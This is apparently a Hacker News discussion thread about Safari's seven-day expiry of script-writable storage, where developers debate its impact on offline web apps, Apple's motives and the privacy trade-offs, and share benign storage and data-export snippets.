But the argument that this will protect privacy in the first place seems really weak.

Before this change in Apple's policy, an app could store my config data on my PC.

After this change, they'd need to have me log in and send the config data to their servers.

That seems like I've lost privacy, not gained it.

TeMPOraL(2761) 3 days ago [-]

It's not 'limiting browser storage', it's making browser storage expire. TFA's example is just some random app, but this essentially kills the entire concept of an offline-first web app, and severely hurts the browser as an application platform.

manigandham(779) 3 days ago [-]

Technically local data is more private than contacting a remote server to download it again. I don't see that being a controversial stance.

k__(3378) 3 days ago [-]

I know this is ad hominem, but your comment just sounds like 'I make big money with native apps and don't want web apps to catch up!'

vbezhenar(3839) 3 days ago [-]

> If you want more access, make a native app (with or without web technologies).

Browsers usually ask for an additional permission in cases like this, which would be a good approach here too. Your post sounds like 'browsers need to be severely limited, so if you want to watch video, just launch VLC'. It does not work this way.

alerighi(10000) 3 days ago [-]

Making a native app is more complicated than making a web app, especially if you want something cross-platform. Browsers are now a universal virtual machine, what the JVM was years ago, and with WebAssembly we will see more and more things done in the browser.

The real 'write once, run everywhere' is web apps: a web app doesn't care whether you are using Apple, Windows, Linux, BSD, whatever; if you have a compatible browser, you can use the app.

Sure, there is Electron (or React Native), but to me it doesn't make sense: what is the point of every application shipping what is basically a browser? And Electron apps still need to be compiled and packaged for every platform, while with web apps you enter the URL in the browser and you are done.

Doesn't it make more sense to add APIs to browsers not only for local storage but also for accessing the filesystem of your device (asking the user's permission, of course)?

Of course, what Apple really fears is losing control of the apps that get used on their devices. Right now they control the App Store, which is the only way to get apps onto their devices (besides jailbreaking); with web apps it's different, since you can access them directly from the browser.

And the absurd thing is that the first iPhone didn't have the App Store, since Apple decided that the only way to get third-party apps was through the browser; now they are aiming for the opposite.

zzzcpan(3749) 3 days ago [-]

> Browsers need to be severely limited due to them running arbitrary code from the web. Doesn't matter if it's an offline web app. If you want more access, make a native app (with or without web technologies).

Native apps have the same problems too, and such 'severe' limiting of apps in web browsers still doesn't solve them. The only more or less privacy-preserving model I can think of for native apps today is open source repositories with app distribution not controlled by the app developers, like F-Droid or the repositories in various Linux distros.

untog(2451) 3 days ago [-]

Genuine question: what makes native ad frameworks different here? They execute with the same privileges as their containing app, so surely they're open to similar privacy concerns. Shouldn't native apps have their storage cleared?

kkarakk(10000) 3 days ago [-]

Or maybe it's Apple's responsibility to figure out how that use case can exist without security flaws?

As a customer, I'm tired of device functionality being limited because of 'security risks'. Functionality that is arguably superior to native apps, apart from the security risk.

greggman3(10000) 3 days ago [-]

Wouldn't making it first-party-only cover it? I don't see how this has anything to do with privacy/tracking. Webpages can still leave long-term cookies. The only way this is a privacy issue is if third-party iframes can use localStorage, but just as third-party resources have their cookies blocked, so too could localStorage.

Otherwise this has absolutely nothing to do with privacy or tracking.

bg0(10000) 3 days ago [-]

I really appreciate this link. I would have never seen this otherwise. It's kind of a disappointment for us on the enterprise side. Our main offering is an offline app where people are disconnected from the internet for weeks, and we use localStorage to validate who they are. It's a bit vague how this affects apps that don't use Safari. Nevertheless, we might have to really think about the user experience here now that this update is out.

roywashere(10000) 3 days ago [-]

To be honest, HTML5 LocalStorage was always different on iOS compared to other platforms. The iOS browser's localStorage is stored under /caches, so it is cleaned when the device runs low on disk space. I found out the hard way: I had a Cordova app which ran on Android and iOS (and the web) and saved an account token in LocalStorage. Some iOS users kept getting logged out, mostly users with smaller-capacity iPhones!

Now we store the account token in the iOS keychain, and that works.

ref: https://stackoverflow.com/questions/32927070/complete-data-l...

yohannparis(10000) 3 days ago [-]

Webkit's website says: '[..] deleting all of a website's script-writable storage after seven days of Safari use without user interaction on the site.'

It is not clear whether a user who comes to your website within the 7 days, even offline, is exempt from it.

duxup(4060) 3 days ago [-]

Yeah, I've got a lot of users with very shaky internet and intermittent involvement with a given application (not using it for a month or more). This presents some serious challenges, or outright impossibilities, for those users' use of a web app when they're not online.

I hope they come up with some good options as this news settles. It's hard to see this as anything but a push, even just an accidental one ('well, you should have written an app for the App Store all along'), to force folks to write a native app and participate in the App Store.

diggan(872) 3 days ago [-]

Yeah, as far as I understand, cookies are the only storage method left for long-term storage of user data. If I'm wrong, someone please correct me.

Edit: getting downvoted without any reasoning provided, so I assume I'm incorrect: are there more (or fewer) ways of storing data in the future for Safari users?

yesimahuman(2544) 3 days ago [-]

If you're using Cordova or Capacitor, this is why, at Ionic, we recommend never using localStorage for storing important data. Better to use an explicit filesystem storage solution like SQLite.
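A rough sketch of that advice, assuming the cordova-sqlite-storage plugin (the window.sqlitePlugin global and the WebSQL-style transaction API are that plugin's; the table and values here are made up):

    // After the 'deviceready' event, open a real on-disk database.
    const db = window.sqlitePlugin.openDatabase({ name: 'app.db', location: 'default' });

    db.transaction((tx) => {
      tx.executeSql('CREATE TABLE IF NOT EXISTS kv (key TEXT PRIMARY KEY, value TEXT)');
      tx.executeSql(
        'INSERT OR REPLACE INTO kv (key, value) VALUES (?, ?)',
        ['settings', JSON.stringify({ theme: 'dark' })]
      );
    }, (err) => console.error('transaction failed', err));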

nradov(905) 3 days ago [-]

Have you considered porting to a native application?

nicoburns(10000) 3 days ago [-]

I really hope the outcry about this is big enough to get Apple/WebKit to reconsider. With service workers and improvements in browsers/CPUs, PWAs (aka web apps) were just getting to the point where they could compete with native apps for a number of use cases. And they had much better privacy/security properties. This doesn't completely kill that, but it's a big setback.

pier25(2695) 3 days ago [-]

> I really hope the outcry about this is big enough to get Apple / Webkit reconsider

I seriously doubt it. Apple has been undermining web dev for years.

JumpCrisscross(38) 3 days ago [-]

> they had much better privacy / security policies

Why is a PWA better from a privacy or security perspective than a native app?

vanderZwan(3173) 3 days ago [-]

I would be OK with 7 days being the default with a permission model where I can grant a website longer storage time.

Actually, I'd be even happier if any form of offline storage required explicit user permission anyway.

m-p-3(10000) 3 days ago [-]

There's certainly a balance to achieve there. Too few permission prompts and you lose control; too many and you get desensitized or, even worse, annoyed at them.

layoutIfNeeded(10000) 3 days ago [-]

Both network usage (in native apps) and storage (both for native and web apps) should prompt for permission IMO.

streptomycin(4237) 3 days ago [-]

Even before this change, data in IndexedDB was kind of volatile - if a device was low on space, browsers could delete stored data.

https://dexie.org/docs/StorageManager describes the StorageManager API, which lets you prompt the user to allow your IndexedDB data to be stored more reliably. My first thought after reading this article was wondering if this would allow an exception to the 7-day rule... but then I remembered that Safari is the only 'modern' browser which does not support the StorageManager API.

lol, sucks for users of my client side JS video game!
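For reference, this is roughly what the StorageManager API looks like in browsers that do ship it (Safari, per the comment above, did not at the time):

    // Ask the browser to treat this origin's storage as persistent
    // rather than 'best effort' (evictable under pressure).
    async function requestDurableStorage() {
      if (navigator.storage && navigator.storage.persist) {
        const granted = await navigator.storage.persist(); // may prompt the user
        const { usage, quota } = await navigator.storage.estimate();
        console.log('persisted:', granted, '| usage:', usage, 'of', quota, 'bytes');
      }
    }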

Aardwolf(10000) 3 days ago [-]

> Actually, I'd be even happier if any form of offline storage required explicit user permission anyway.

Even offline storage that is only used locally? Say a game with savegames that doesn't use an online connection to play.

Another example: a password manager.

jwr(3920) 3 days ago [-]

I have an app which isn't offline, but I wanted to make use of IndexedDB and LocalStorage to make things faster for users. Now I wonder if it's worth the effort to even try. I think this pretty much kills the utility of all local storage initiatives.

My app is an inventory control system used by businesses that build electronics (https://partsbox.com/). Deleting client-side data after 7 days is ridiculous. You can't assume that people will always log in every week; in small businesses or design/manufacturing companies there are times when 2-3 weeks can pass without building new hardware or touching inventory.

gok(538) 3 days ago [-]

Your demo page is 3.23 MB. ~500KB is javascript, ~500KB is CSS and another ~400KB is web fonts. The parts database is 24 KB. That's certainly not the first place I would look for an optimization target, even for customers with very large parts databases.

k__(3378) 3 days ago [-]

CouchDB and Amplify DataStore do delta syncs; would that get around the problem?

If you put data in IDB, it will stay there for 7 days, and then, if it gets deleted, the delta sync would just download it again.
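A sketch of that pattern using PouchDB (a CouchDB-protocol client that stores locally in IndexedDB; the remote URL is a placeholder):

    // Local writes land in IndexedDB; live replication means that if
    // Safari evicts the local database, sync re-downloads the documents.
    const local = new PouchDB('notes');
    const remote = new PouchDB('https://couch.example/notes');

    local.sync(remote, { live: true, retry: true })
      .on('error', (err) => console.error('sync error', err));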

diegoperini(4242) 3 days ago [-]

Both your and Apple's concerns are valid. This change makes apparent the fact that these local storage mechanisms are (arguably) caches.

Some web apps already saw the danger of having an easily purgeable storage on the client side and simply implemented an export function in their tools. I admire those tools more than the ones that overuse local storage for everything.

One such tool is draw.io, a flowchart maker. You use the app, persist everything in local storage, and when you are done, you export your project into a file, all on the client side. When you need to edit, you import the file on launch. It's portable, it's protected from browser bugs/decisions, and IMHO it's pretty user (privacy) friendly.
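The export side of that approach needs nothing beyond standard browser APIs; a minimal sketch (file name and state shape are arbitrary):

    // Serialize app state and hand the user a file, entirely client-side.
    function exportState(state, filename = 'backup.json') {
      const blob = new Blob([JSON.stringify(state, null, 2)], { type: 'application/json' });
      const url = URL.createObjectURL(blob);
      const a = document.createElement('a');
      a.href = url;
      a.download = filename;
      a.click();
      URL.revokeObjectURL(url);
    }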

fossTheWay(10000) 3 days ago [-]

>deleting all local storage (including Indexed DB, etc.) after 7 days

Evil company. How do we fix this? Shame users?

The problem is that the users are so brainwashed from decades of Marketing.

lotsofpulp(10000) 3 days ago [-]

> The problem is that the users are so brainwashed from decades of Marketing.

Is there any other device or ecosystem of devices where my parents can fix their problems by turning it off and on? The fact that I have 80-year-old grandparents who can't read English using iPads and iPhones is not just marketing; that's 'not having to google and download Malwarebytes and CCleaner and go into regedit' to maybe fix issues.

davweb(4090) 3 days ago [-]

I think the original post is oversimplifying the new behaviour a little. If you look at the other blog post on ITP 2.3 [1] it says:

> ITP 2.3 caps the lifetime of all script-writeable website data after a navigation with link decoration from a classified domain.

I.e., the 7-day timeout for local storage only kicks in if you've been redirected from a domain that ITP has classified as one that tracks users. So, for example, web apps that users navigate to directly would be unaffected.

[1]: https://webkit.org/blog/9521/intelligent-tracking-prevention...

magicalist(4152) 3 days ago [-]

> If you look at the other blog post on ITP 2.3...

Why would you look at the old blog post for the new behavior?

It's all web pages, regardless of classification or redirects. The new WebKit blog post is quite clear:

> Now ITP has aligned the remaining script-writable storage forms with the existing client-side cookie restriction, deleting all of a website's script-writable storage after seven days of Safari use without user interaction on the site

https://webkit.org/blog/10218/full-third-party-cookie-blocki...

Or straight from the ITP lead's twitter:

> Fifth, all script-writeable storage is now aligned with the 7-day expiry Safari already has for client-side cookies.

https://twitter.com/johnwilander/status/1242516001939324928

(with follow up replies on what resets the seven day clock)

brlewis(1545) 3 days ago [-]

You're describing behavior from 2019-09-23.

I see the same 'oversimplification' in WebKit's 2020-03-24 blog post linked from the original post. See '7-Day Cap on All Script-Writeable Storage' in https://webkit.org/blog/10218/full-third-party-cookie-blocki...

t0astbread(10000) 3 days ago [-]

Okay, that's good, but still: couldn't a domain on that list be weaponized against legitimate sites this way? For example:

- Somehow goodsite.com's user ends up on evil.com

- evil.com redirects to goodsite.com?clickID=1234

- goodsite.com's storage gets flagged

pier25(2695) 3 days ago [-]

> So, for example, web apps that users navigate to directly will be unaffected.

I don't think that's true.

I asked the head of Webkit dev on Twitter and he said:

> This time limit affects first-party storage

https://twitter.com/othermaciej/status/1242926762029285376

noobquestion81(10000) 3 days ago [-]

This! ^

Could someone please change the title of this post? It's rather inaccurate and spreading FUD... legitimate offline web applications are not going to randomly lose their storage abilities in Safari. Tons of people read this (admittedly hard to follow) blog post quickly and then took a nose-dive into their own hot takes.

Hoping WebKit pushes another of these posts later to clear things up.

BiteCode_dev(10000) 3 days ago [-]

> website.example will be marked for non-cookie website data deletion if the user is navigated from a domain classified with cross-site tracking capabilities to a final URL with a query string and/or a fragment identifier, such as website.example?clickID=0123456789.

So my guess is you are fine most of the time, except if you allow other sites to embed your content in their page. In that case, you should:

- provide the embed on a separate subdomain

- remove features requiring identification if the content is viewed embedded: attempting to use them redirects to the real site.

Otherwise ITP will mark your domain as tracking and wipe you after 7 days if your users don't interact directly with the site.

I have a hard time deciding if it's a good thing or not.

I guess it has the potential to be mostly a good thing, provided that:

- I understood it correctly, which I'm not sure about, as their wording is not clear.

- It's implemented correctly. Once the deal is done, it's in the wild for years, fix or not.

- It's implemented in good faith. Apple wants to promote the App Store and has shown itself willing to neuter web apps in the past.

I still have a strange bad feeling about this.

kevin_thibedeau(10000) 3 days ago [-]

When will Google Analytics and Google Tag Manager get onto this list of trackers? Lots of web apps are using them.

pspeter3(3406) 3 days ago [-]

I think confirmation in the blog post yesterday would have provided a lot of clarity.

wolco(3800) 3 days ago [-]

It doesn't scale from device to device for settings or items that should stay for longer than a week.

Local storage should be treated as a cache... it may get refreshed.

What Apple did was fine. A backend isn't only for storage either.

soapdog(4079) 3 days ago [-]

It is not fine if you're creating apps that don't have a backend.

SahAssar(10000) 3 days ago [-]

A lot of 'normal' apps treat local storage this way. A lot of those apps are basically a wrapper around a WebView. Why does Apple accept it there but not for PWAs?

WalterSear(3758) 3 days ago [-]

This sounds like a death knell for my personal project: a fully decentralized collaborative task/wiki, built on IPFS and encrypted against your blockchain wallet. I had just migrated the backend off Firebase, too, and was ready to re-launch the beta next week.

Pretty much any PWA that was using IPFS as anything but a caching/distribution layer is no longer viable. This is a huge blow to decentralization technology.

Sure, you can make a standalone app, but that is going to cripple already difficult adoption.

This sucks :(

soapdog(4079) 3 days ago [-]

I'm coming from a decentralization tech background as well and was working on similar stuff. That's why I'm so angry at this arbitrary decision by Apple. This is just them breaking something that has been working well.

hawaiian(10000) 2 days ago [-]

I know I'm in the minority, but I'm glad this change is happening. I simply don't trust large tech companies to keep user privacy a top priority, and in my mind, this outweighs whatever UX niceties an honest company may provide.

jeswin(2415) 2 days ago [-]

The solution could be to give that option to users: a way to mark a website or app as trusted or not. Apple's approach, on the other hand, really sets back web apps, which I (as a privacy-conscious individual) am more comfortable using than native apps.

If this encourages more apps to go the native route, we've done more harm than good. Apps can gather a lot more data than websites, such as the dreaded contact list access.

alexcroox(3984) 3 days ago [-]

Are we absolutely sure they don't just mean the localstorage containers that aren't part of the current domain? In the same way they are clearing cookies from a different domain, and not the ones that belong to the current domain.

EDIT: Clarification from a Webkit dev https://twitter.com/alexcroox/status/1242559843354972161

dangoor(3929) 3 days ago [-]

Yeah, if you look at the section in question, they're talking about this: 'However, as many anticipated, third-party scripts moved to other means of first-party storage such as LocalStorage.'

Basically, the ad tech/tracker folks were using first-party site storage to store identifiers, which is what Apple's trying to protect against.

reilly3000(4310) 2 days ago [-]

This is really in response to the irresponsible use of APIs for trackers. Evercookie is a stunning example of how far it can go... From their repo:

- Standard HTTP Cookies
- Flash Local Shared Objects
- Silverlight Isolated Storage
- CSS History Knocking
- Storing cookies in HTTP ETags (Backend server required)
- Storing cookies in Web cache (Backend server required)
- HTTP Strict Transport Security (HSTS) Pinning (works in Incognito mode)
- window.name caching
- Internet Explorer userData storage
- HTML5 Session Storage
- HTML5 Local Storage
- HTML5 Global Storage
- HTML5 Database Storage via SQLite
- HTML5 Canvas - Cookie values stored in RGB data of auto-generated, force-cached PNG images (Backend server required)
- HTML5 IndexedDB
- Java JNLP PersistenceService
- Java exploit CVE-2013-0422 - Attempts to escape the applet sandbox and write cookie data directly to the user's hard drive.

https://github.com/samyk/evercookie

In short, everything and more can be used for tracking, and that has really killed the party for the many people who have created responsible, useful applications of these browser APIs.

thu2111(10000) 2 days ago [-]

It's really in response to a confused, ad-hoc web privacy model that has never been designed and is simply incrementally patched over time in response to complaints from an equally confused, directionless and visionless 'privacy warrior' subculture.

Mobile apps suffer these kinds of problems far less, partly because it's understood that mobile users don't install apps and then get upset about 'tracking'. In fact, the vast majority of apps will want you to sign in to some sort of account, and those that don't will be using ad networks to fund themselves; users understand and accept this, and throwing up permission screens doesn't achieve much because users will typically grant the permissions. Privacy on mobile platforms is more about stopping activity the average user would recognise as illegitimate spying: turning on cameras and microphones to feed conversations to angry ex-girlfriends, that sort of thing.

If the web's architecture had some sort of coherent view on how the tension between users, content providers and advertisers should work, then we wouldn't see this steady endless churn of app-breaking API changes. Everyone would know the rules of the road and there'd be way less tension as a result. Mobile platforms aren't quite there because they were designed with security architectures that were then pressed into service as ad-hoc privacy architectures, but they're still far more coherent on the topic than the web.

dep_b(10000) 2 days ago [-]

You could permission-wall that stuff, just like iOS asks for permission to access your location. If a random website wants to mess with Local Storage, I know that I need to turn around.

schoenobates(10000) 2 days ago [-]

"... abusing over a dozen technologies..." is this a proof-of-concept or a real thing ? It just seems too horrendous to be real.

I think your comment really hits the nail on the head, IMHO the frustration shouldn't be directed toward Apple but more toward the groups who have pushed the tracking practice so far to necessitate such draconian measures.

pat2man(4002) 3 days ago [-]

Sounds like the solution is to add the app to your home screen. I don't think it's reasonable for a browser to let any site I ever interact with store data on my device indefinitely.

dwnvoted2hell(10000) 3 days ago [-]

I don't understand why you wouldn't rely on some other normal local storage for an app, except to be super lazy making cross-device apps with some platform. I think that's what all the screaming is about. Low-budget cross-compatible apps will suffer.

soapdog(4079) 3 days ago [-]

Even web apps that you add to your home screen are subject to this.

nikkwong(3698) 3 days ago [-]

It depends on the context. For example, I use an invoicing web app that stores previously created invoices indefinitely in localStorage. This gives me the benefit of not having to manage login credentials and keeping everything client-side. It also gives the site's developers the benefit of not having to manage user accounts or server-side state.

Without being able to use localStorage as a long-term store, I'll have to register for an account, deal with them handling my data, etc. Losing the functionality of localStorage as a long-term store has real disadvantages.

megous(4302) 3 days ago [-]

How does this make sense logically? Obviously the websites that you use the most have the biggest potential and opportunity to track you. All local storage should be deleted for the most-used websites at random times, on average several times a week, with no extensions for recent website usage.

If this is done for privacy's sake, that is.

quotemstr(3690) 3 days ago [-]

> All local storage should be deleted for the most used websites at random times, at avg. several times a week, without any extensions caused by recent website usage.

No matter what browser vendors do, it will never be enough for 'privacy' activists.

flixic(3714) 3 days ago [-]

Safari was already lagging behind Chrome, Chrome forks, and Firefox in a lot of feature adoption. This will only make it more of a 'new Internet Explorer', a browser that sites recommend you NOT use.

realusername(3793) 3 days ago [-]

As a web developer, I spend as much time fixing stuff for Safari as for IE11; I consider them to be on a similar level.

twsted(2860) 3 days ago [-]

Normally when one says 'the new Internet Explorer' they mean 'the browser that was always recommended', 'the browser that stopped innovation because it was almost the only one used'.

scarface74(3932) 3 days ago [-]

Good luck with telling people not to use Safari (or more accurately WebKit) on iOS....

slaymaker1907(10000) 3 days ago [-]

I agree, this is really stupid. Data should only be reclaimed when requested by the user, or if more storage is needed on the system, on an LRU policy per site.

olliej(3716) 3 days ago [-]

Could you ask all the privacy abusers to stop using them to abuse privacy?

Seriously, you should browse the web for a bit and see just how many 'client-side PWAs' you've used/installed vs. how many tracking identifiers have been installed.

Abishek_Muthian(4072) 3 days ago [-]

I think looking at Apple as the saviour of privacy is, for lack of a better term, just wrong. They have always favoured closed systems, even when they didn't provide privacy advantages or, as in this case, were counterproductive for privacy.

I feel the comparison of Apple with data companies such as Google and Facebook is itself at fault. Apple, like any computer company of the 70s, was not into data, simply because the Internet didn't exist at that point like it does now. 'Apple didn't choose to be in data' is projected as altruism instead of just a marketing ploy (they didn't choose, because the option wasn't available).

Apple doesn't receive even a fraction of the scrutiny Google and Facebook receive (which they should): e.g. the iCloud hack, Apple's response to iOS vulnerabilities targeted by state actors, newer Safari being incompatible with privacy extensions such as uBO, etc.

Personally, I feel good that Apple is not into data, just because I feel that if they were, they might be more evil than Google or Facebook, aided by their walled garden.

Arnt(10000) 3 days ago [-]

This is WebKit, which is open source. Apple took an existing HTML/CSS/DOM engine, rewrote it, renamed it, and open-sourced its version, too.

It's compiled using LLVM, which also contains thousands of lines of open source code by Apple.

Of course you might argue that these examples don't prove your sweeping statement false, but please read https://en.wikipedia.org/wiki/No_true_Scotsman before arguing.

millstone(10000) 2 days ago [-]

When you use Apple Maps, Apple doesn't know who you are or where you go. There's not even a way to sign in.

It's not incompetence. When you request a route, your iPhone breaks up the request into separate, unrelated segments so Apple doesn't even know your total route. They've done work to avoid tracking you.

Call it a 'marketing ploy' or 'altruism' or whatever, but the fact is that Google wants to know where you go, and Apple doesn't.

saagarjha(10000) 3 days ago [-]

> They have always favoured closed systems even if didn't provide privacy advantages

Yes.

> or as in this case was counter-intuitive for privacy

I fail to see how this is counter-intuitive for privacy.

> iCloud hack

Targeted spearphising?

> Apple's response to iOS vulnerabilities targeted by state actors

https://news.ycombinator.com/item?id=20897368

> Newer Safari being incompatible with privacy extensions such as uBO etc.

https://news.ycombinator.com/item?id=21025252

diggan(872) 3 days ago [-]

I think looking at ANY company as the savior of privacy is a waste of time. Companies have proven time and time again that they are unable to self-regulate on this. The only way forward is to introduce legislation that makes it illegal to track users using privacy-invasive practices; otherwise we'll never get rid of it. A company can be privacy-preserving today, but then the leadership changes or an acquisition happens, and now they change their practices without informing users.

I simply see no technological solution to this problem; it'll always be a cat-and-mouse game until governments catch up and make it illegal.

I'm eager to hear if someone here does have any solution to this problem though.

lcfcjs2(10000) 3 days ago [-]

Google is bad, and Facebook is worse.

FreakyT(3451) 3 days ago [-]

Agreed — Apple's trying to project a high-minded motivation here, but their real motivation is likely to try and limit web technologies so that companies must still invest in native iOS apps and remain within their walled garden.

rs23296008n1(10000) 3 days ago [-]

If privacy really is the thing, why can't I have an extension on iOS to let me expire various cookies/storage on a per-domain basis, e.g. so I can write my extension to limit some cookies/storage to minutes or even seconds, depending on how hostile or blacklisted they are?

Other domains I'd actually prefer to be indefinite. I've got a notepad thing that uses local storage and doesn't store its data on the server. There's no excuse for deleting its data, since it's user data. Apple therefore has no permission to delete that data. Do I have a non-cloud workaround for that?

hokumguru(4338) 3 days ago [-]

Yeah: an app. They're kneecapping PWAs to make native apps more appealing.

40four(4332) 2 days ago [-]

Anybody have an idea what the significance of the seven-day cutoff is? I can't imagine this magic number does anything to improve security. It seems kind of arbitrary.

chadcmulligan(4110) 2 days ago [-]

7 days is the sideloading limit, I think, so they're treating these apps as sideloaded? Everything has to go through the App Store, at a guess?

donohoe(163) 3 days ago [-]

I think it is worth noting that you can't really say 'Apple' is doing this or 'Apple' is doing that with decisions at this level.

The company is just too big and not working in unison.

The Apple Safari team is killing/hurting offline apps. The author asks why they don't take the same approach in Apple News - as if it were the same team in charge. It's a different team with different priorities, likely not talking to the other.

I think the larger point is valid - but it's better to understand that this isn't some cohesive cross-company strategy at play. It's sizeable teams working on their own priorities within a larger roadmap (presumably).

JustSomeNobody(4099) 3 days ago [-]

I love these types of comments. They contrast very well with the "the reason Apple makes great products is because their hardware and software teams work so closely together to bring a cohesiveness that other companies can't" comments.

diggan(872) 3 days ago [-]

As Apple is one of the most closed companies, it's hard to put blame on anything Apple-related, as you don't really know who the teams are. Sure, WebKit contributors are visible as it's an open source project, but who is the 'Apple Safari team' really? And who is the 'Apple News' team?

Easiest is just to put blame on the top-level entity, which is Apple. They have control over their teams so they can redirect the blame if they feel it's needed.

And if the point of this change is to force more developers to build native apps on their platform, then it is for sure a cohesive cross-company strategy. But we don't know if that's the case.

diegoperini(4242) 3 days ago [-]

I already have a comment on this subject in a thread here but I believe this should be stressed more explicitly.

Apple didn't kill offline web apps. You can always add an interaction to your app which exports the stored data into a file which can then be saved by the user. It can be done entirely on the client side as well. If anything died here, it is the user's implicit consent to unnoticed storage space consumption. Implementing an export function will automatically make your app portable, which is always appreciated, I believe.

Most data in local storage is some kind of structured tree, table, or blob. All can be exported with little effort.

HTML5 games -> Prompt user with a dialog to download saves/assets after they play the game for a while.

Productivity apps -> Detect 'ctrl/cmd + s' to prompt a save dialog (see the sketch after this list). Add save buttons somewhere visible.

Map-like apps -> Do nothing. If the user is not visiting the map for 7 days, they don't need the map data persisted either. If necessary, allow explicit saving with UI buttons for people who travel often.

Apps/sites which use local storage for auth-related artifacts -> Notify users if they click 'Remember Me' and explain the caveats to them. Allow for encrypted saving if users ask for it.

Kiosks -> Use Electron or a similar tech.
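For the productivity-app item above, intercepting the save shortcut is a few lines; collectAppState() and exportState() are hypothetical stand-ins for whatever the app actually does:

    // Route Ctrl/Cmd+S to the app's own export instead of the browser's
    // 'save page' dialog.
    window.addEventListener('keydown', (e) => {
      if ((e.ctrlKey || e.metaKey) && e.key === 's') {
        e.preventDefault();
        exportState(collectAppState()); // hypothetical app functions
      }
    });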

I am open to counter arguments. I don't have any idea about how mobile browsers behave for the scenarios stated above.

Edit: I use draw.io since last year and the experience there is as refreshing as it can be in this SPA jungle. I use it as a good example to learn from for my own web app projects.

kristiandupont(1920) 3 days ago [-]

>I don't have any idea about how mobile browsers behave for the scenarios stated above.

That's the problem: it won't work there. Apple's support for PWAs is frustrating, to say the least.

It's fair that you might need consent from the user before storing and keeping large amounts of data, but by removing the option you are forcing a bunch of developers to make a native app instead of a web app, which I find quite infuriating.

duxup(4060) 3 days ago [-]

>You can always add an interaction to your app which exports the stored data into a file which then can be saved by the user.

But... why? Drag the user through some dialog to save a file locally, manage it, and be responsible for it? That seems very... old/unnecessary.

The fact that applications store some random things locally is, to me, neither surprising nor a hassle. Browsers already cache files and so on. Unless I don't know something, LocalStorage and other non-cookie options seem just fine/safe.

I get the concerns about cookies and such, but this seems a step beyond what is needed, into the realm of the unnecessary and a hassle for the user.

Maybe I'm missing some bad patterns / dark patterns using LocalStorage and the like, but it seems to throw them out with the bathwater.

pier25(2695) 3 days ago [-]

These are workarounds for a problem that shouldn't exist in the first place.

alerighi(10000) 3 days ago [-]

Doesn't make sense; just ask the user for permission to use local storage, if that is the concern.

But that is not the concern. The concern is that they fear more and more developers are moving to web apps instead of developing native apps that need to pass through the App Store and thus be approved by Apple, and they don't like that.

megous(4302) 3 days ago [-]

- Give the user the option to enable 'unlimited' storage on a per-domain basis. There's already a standard API for that.

aquadrop(4272) 3 days ago [-]

And for what? To save space? That's ridiculous.

> If anything died here, it is the implicit consent by the user for allowing unnoticed storage space consumption

What about explicit consent? It also dies. That's just inventing problems.

donatj(3615) 3 days ago [-]

This might technically work, but it is absurdly user-unfriendly.

Name a modern game that requires you to manually manage game-state files, let alone one without autosave. It's a feature users expect, and they're going to have a bad time. I don't want to play a quick game on my phone and have to remember to save, and where I am keeping my save files.

I'd argue a far better option would be to treat local storage as a permission, like camera or microphone.

floatingatoll(4062) 3 days ago [-]

It seems like the Storage Standard [1] could be combined with the writeable-files proposal [2] to permit the same sort of behavior for local files-on-disk webapps as mobile apps receive, where they can download large asset files and store them on disk in a persistent cache:

https://storage.spec.whatwg.org

https://wicg.github.io/native-file-system/

snemvalts(10000) 3 days ago [-]

So I can start to manage save files on my disk? In 2020?? This is absurd.

Apple should fix their Safari bugs before starting with this nonsense.

henriquez(10000) 3 days ago [-]

Also, you could sync data to an API and offer a login function. If the cookie expires, log in and download your data again. This could be end-to-end encrypted for privacy, and having remote storage enables other clients to log in and access the same data. Either way, it's wise to have some kind of persistence option beyond just cookies and localStorage.

It's annoying how far Apple is behind Mozilla and Google when it comes to progressive web app functionality, but I don't think their action is as user-hostile as is being claimed here.
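A hedged sketch of that end-to-end-encrypted sync, using the standard WebCrypto API; the /api/backup endpoint and the key management are placeholders:

    // Encrypt client-side with AES-GCM so the server only ever sees
    // ciphertext; 'key' is a CryptoKey the client controls.
    async function encryptAndUpload(key, state) {
      const iv = crypto.getRandomValues(new Uint8Array(12));
      const plaintext = new TextEncoder().encode(JSON.stringify(state));
      const ciphertext = await crypto.subtle.encrypt({ name: 'AES-GCM', iv }, key, plaintext);
      await fetch('/api/backup', {
        method: 'POST',
        body: new Blob([iv, new Uint8Array(ciphertext)]),
      });
    }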

gridlockd(10000) 3 days ago [-]

Dear lord, I hope you don't have any UX design responsibilities.

> Apple didn't kill offline web apps.

Yes, they did. For an app to work offline, you need to be able to at least cache the app itself. If that gets wiped after seven days, you can't call your app 'offline capable'.

> If anything died here, it is the implicit consent by the user for allowing unnoticed storage space consumption.

What about the 'implicit consent' that bandwidth is being consumed?

> You can always add an interaction to your app which exports the stored data into a file which then can be saved by the user.

That would be awful. Imagine being prompted to import your data every time you launch it.

Maybe that sort of works with document-centric apps that have no persistent settings, but even then it wouldn't be possible to integrate properly into the file system in the way users would expect (file associations).

> HTML5 games -> Prompt user with a dialog to download saves/assets after they play the game for a while.

More like constantly reminding the user that their valuable progress gets wiped after seven days, should they make the poor choice to run the app offline.

> Productivity apps -> Detect 'ctrl/cmd + s' to prompt a save dialog. Add save buttons somewhere visible.

Same as above, except the data might be even more valuable.

> Apps/sites which use local storage for auth related artifacts -> Notify users if they click 'Remember Me' and explain them the caveats.

'I'm sorry, we made a decision to write an app with technology that, in hindsight, we shouldn't have used. Therefore, your user experience will now be more annoying. Thanks for sticking with us while we're rewriting the app!'

thosakwe(4098) 3 days ago [-]

I don't understand why the title was changed - the focus of the article isn't just the fact that WebKit is changing how it handles local storage, but also a criticism of Apple's motivations for this decision.

thosakwe(4098) 3 days ago [-]

Original article was here, in case my comment makes no sense now: https://news.ycombinator.com/item?id=22683535

I was confused as to why the page in question had changed, but I realized it was moved.

zeveb(631) 3 days ago [-]

And the new title no longer has any relationship to the title of the post. And no admin (from what I can see) even bothered to let us know why he censored this.

edit: 17 minutes after posting this comment critical of moderation, I am unable to submit a new story. Coincidence?

meesterdude(3643) 3 days ago [-]

WebKit is open source - can't this be changed (be it by fork or a commit proposal)?

The_rationalist(10000) 3 days ago [-]

The PlayStation browsers use WebKit, BTW (they are a decade late in switching to Chromium...)

matkalaukku(10000) 3 days ago [-]

Sure it can be forked, but the problem is the millions of devices running Apple's version of Safari/WebKit on iOS without any say in it except switching to Android.

abrowne(3853) 3 days ago [-]

Sure, so maybe WebKitGTK will (if this applies to that version). But why would Apple choose to include this fork over their own version in their OSes? And if they don't, how do you plan on using it with any Apple OS?

starbugs(1952) 3 days ago [-]

Is this really that big of a problem? You had to expect that local storage could be deleted without any notice anyway, in every web app.

MatthewPhillips(1962) 3 days ago [-]

